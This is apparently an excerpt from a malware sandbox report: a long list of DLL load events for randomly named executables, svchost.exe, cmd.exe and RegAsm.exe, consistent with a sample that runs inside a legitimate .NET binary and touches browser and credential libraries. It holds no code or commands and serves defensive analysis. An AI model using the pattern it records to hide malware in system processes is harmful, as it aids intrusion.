Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Section loaded: windows.storage.dll
